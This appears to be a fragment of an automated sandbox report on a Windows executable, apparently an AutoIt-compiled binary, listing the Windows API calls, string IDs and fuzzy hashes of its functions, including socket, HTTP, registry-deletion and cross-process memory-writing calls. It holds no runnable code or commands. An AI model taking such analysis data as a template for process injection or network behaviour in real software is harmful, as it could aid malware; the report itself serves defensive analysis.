                            • API String ID: 3539004672-0
                            • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                            • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                            • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                            • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                            APIs
                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                            • Sleep.KERNEL32(0000000A), ref: 0047D455
                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                            Similarity
                            • API ID: Interlocked$DecrementIncrement$Sleep
                            • String ID:
                            • API String ID: 327565842-0
                            • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                            • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                            • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                            • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                            APIs
                            • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                            • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                            • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                            Similarity
                            • API ID: PrivateProfile$SectionWrite$String
                            • String ID:
                            • API String ID: 2832842796-0
                            • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                            • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                            • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                            • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                            APIs
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                            • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                            Similarity
                            • API ID: Enum$CloseDeleteOpen
                            • String ID:
                            • API String ID: 2095303065-0
                            • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                            • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                            • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                            • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00436A24
                            Similarity
                            • API ID: RectWindow
                            • String ID:
                            • API String ID: 861336768-0
                            APIs
                            • SendMessageW.USER32 ref: 00449598
                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                            • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                            • _wcslen.LIBCMT ref: 0044960D
                            • _wcslen.LIBCMT ref: 0044961A
                            • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: MessageSend$_wcslen$_wcspbrk
                            • String ID:
                            • API String ID: 1856069659-0
                            APIs
                            • GetCursorPos.USER32(?), ref: 004478E2
                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                            • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                            • GetCursorPos.USER32(00000000), ref: 0044796A
                            • TrackPopupMenuEx.USER32(02E16400,00000000,00000000,?,?,00000000), ref: 00447991
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: CursorMenuPopupTrack$Proc
                            • String ID:
                            • API String ID: 1300944170-0
                            APIs
                            • GetClientRect.USER32(?,?), ref: 004479CC
                            • GetCursorPos.USER32(?), ref: 004479D7
                            • ScreenToClient.USER32(?,?), ref: 004479F3
                            • WindowFromPoint.USER32(?,?), ref: 00447A34
                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: Client$CursorFromPointProcRectScreenWindow
                            • String ID:
                            • API String ID: 1822080540-0
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                            • EndPaint.USER32(?,?), ref: 00447D13
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                            • String ID:
                            • API String ID: 659298297-0
                            APIs
                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                              • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                              • Part of subcall function 00440D98: SendMessageW.USER32(02E11B70,000000F1,00000000,00000000), ref: 00440E6E
                              • Part of subcall function 00440D98: SendMessageW.USER32(02E11B70,000000F1,00000001,00000000), ref: 00440E9A
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: Window$EnableMessageSend$LongShow
                            • String ID:
                            • API String ID: 142311417-0
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            APIs
                            • IsWindowVisible.USER32(?), ref: 00445879
                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                            • _wcslen.LIBCMT ref: 004458FB
                            • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                            • String ID:
                            • API String ID: 3087257052-0
                            APIs
                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                            • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                            • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                            • String ID:
                            • API String ID: 245547762-0
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 004471D8
                            • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                            • SelectObject.GDI32(?,00000000), ref: 00447228
                            • BeginPath.GDI32(?), ref: 0044723D
                            • SelectObject.GDI32(?,00000000), ref: 00447266
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: Object$Select$BeginCreateDeletePath
                            • String ID:
                            • API String ID: 2338827641-0
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 00434598
                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                            • Sleep.KERNEL32(00000000), ref: 004345D4
                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: CounterPerformanceQuerySleep
                            • String ID:
                            • API String ID: 2875609808-0
                            APIs
                            • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                            • MessageBeep.USER32(00000000), ref: 00460C46
                            • KillTimer.USER32(?,0000040A), ref: 00460C68
                            • EndDialog.USER32(?,00000001), ref: 00460C83
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                            • String ID:
                            • API String ID: 3741023627-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: Destroy$DeleteObjectWindow$Icon
                            • String ID:
                            • API String ID: 4023252218-0
                            APIs
                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                            • DeleteObject.GDI32(?), ref: 00455736
                            • DeleteObject.GDI32(?), ref: 00455744
                            • DestroyIcon.USER32(?), ref: 00455752
                            • DestroyWindow.USER32(?), ref: 00455760
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Similarity
                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                            • String ID:
                            • API String ID: 1489400265-0
                            APIs
                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                            • DestroyWindow.USER32(?), ref: 00455728
                            • DeleteObject.GDI32(?), ref: 00455736
                            • DeleteObject.GDI32(?), ref: 00455744
                            • DestroyIcon.USER32(?), ref: 00455752
                            • DestroyWindow.USER32(?), ref: 00455760
                            Similarity
                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                            • String ID:
                            • API String ID: 1042038666-0
                            APIs
                            Similarity
                            • API ID: Path$ObjectStroke$DeleteFillSelect
                            • String ID:
                            • API String ID: 2625713937-0
                            APIs
                            • __getptd.LIBCMT ref: 0041780F
                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                            • __getptd.LIBCMT ref: 00417826
                            • __amsg_exit.LIBCMT ref: 00417834
                            • __lock.LIBCMT ref: 00417844
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                            • String ID:
                            • API String ID: 938513278-0
                            APIs
                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                            • ExitThread.KERNEL32 ref: 00413D4E
                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                            • __freefls@4.LIBCMT ref: 00413D74
                            Similarity
                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                            • String ID:
                            • API String ID: 2403457894-0
                            APIs
                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                            • ExitThread.KERNEL32 ref: 004151ED
                            • __freefls@4.LIBCMT ref: 00415209
                            Similarity
                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                            • String ID:
                            • API String ID: 4247068974-0
                            Strings
                            Similarity
                            • API ID:
                            • String ID: 5$8$^
                            • API String ID: 0-3622883839
                            Strings
                            Similarity
                            • API ID:
                            • String ID: )$U$\
                            • API String ID: 0-3705770531
                            APIs
                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                            • CoInitialize.OLE32(00000000), ref: 0046E505
                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                            • CoUninitialize.OLE32 ref: 0046E53D
                            Strings
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                            • String ID: .lnk
                            • API String ID: 886957087-24824748
                            Strings
                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                            Similarity
                            • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                            • API String ID: 708495834-557222456
                            APIs
                              • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                              • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                              • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                              • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                              • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                            Strings
                            Similarity
                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                            • String ID: @
                            • API String ID: 4150878124-2766056989
                            APIs
                            Strings
                            Similarity
                            • API ID: _memmove
                            • String ID: \$]$h
                            • API String ID: 4104443479-3262404753
                            APIs
                            • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • CloseHandle.KERNEL32(?), ref: 00457E09
                            Strings
                            Similarity
                            • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                            • String ID: <$@
                            • API String ID: 2417854910-1426351568
                            APIs
                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                            Strings
                            Similarity
                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                            • String ID:
                            • API String ID: 3705125965-3916222277
                            • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                            • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                            • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                            • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                            APIs
                            • GetMenuItemInfoW.USER32 ref: 0045FAC4
                            • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                            • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                            Strings
                            Similarity
                            • API ID: Menu$Delete$InfoItem
                            • String ID: 0
                            • API String ID: 135850232-4108050209
                            • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                            • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                            • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                            • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                            • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                            Strings
                            Similarity
                            • API ID: Window$Long
                            • String ID: SysTreeView32
                            • API String ID: 847901565-1698111956
                            • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                            • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                            • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                            • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 00434B10
                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                            • FreeLibrary.KERNEL32(?), ref: 00434B9F
                            Strings
                            Similarity
                            • API ID: Library$AddressFreeLoadProc
                            • String ID: AU3_GetPluginDetails
                            • API String ID: 145871493-4132174516
                            • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                            • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                            • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                            • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                            APIs
                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                            Strings
                            Similarity
                            • API ID: MessageSend$Window
                            • String ID: SysMonthCal32
                            • API String ID: 2326795674-1439706946
                            • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                            • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                            • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                            • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                            APIs
                            • DestroyWindow.USER32(00000000), ref: 00450A2F
                            Strings
                            Similarity
                            • API ID: DestroyWindow
                            • String ID: msctls_updown32
                            • API String ID: 3375834691-2298589950
                            • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                            • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                            • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                            • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                            APIs
                            Strings
                            Similarity
                            • API ID: _memmove
                            • String ID: $<
                            • API String ID: 4104443479-428540627
                            • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                            • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                            • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                            • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                            Strings
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID: \VH
                            • API String ID: 1682464887-234962358
                            • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                            • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                            • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                            • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                            Strings
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID: \VH
                            • API String ID: 1682464887-234962358
                            • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                            • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                            • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                            • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                            Strings
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID: \VH
                            • API String ID: 1682464887-234962358
                            • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                            • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                            • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                            • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                            Strings
                            Similarity
                            • API ID: ErrorMode$InformationVolume
                            • String ID: \VH
                            • API String ID: 2507767853-234962358
                            • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                            • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                            • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                            • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                            Strings
                            Similarity
                            • API ID: ErrorMode$InformationVolume
                            • String ID: \VH
                            • API String ID: 2507767853-234962358
                            • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                            • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                            • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                            • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                            APIs
                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                            • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                            Strings
                            Similarity
                            • API ID: MessageSend
                            • String ID: msctls_trackbar32
                            • API String ID: 3850602802-1010561917
                            • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                            • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                            • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                            • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                            Strings
                            Similarity
                            • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                            • String ID: crts
                            • API String ID: 943502515-3724388283
                            • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                            • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                            • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                            • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                            APIs
                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                            • CoInitialize.OLE32(00000000), ref: 0046E505
                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                            • CoUninitialize.OLE32 ref: 0046E53D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
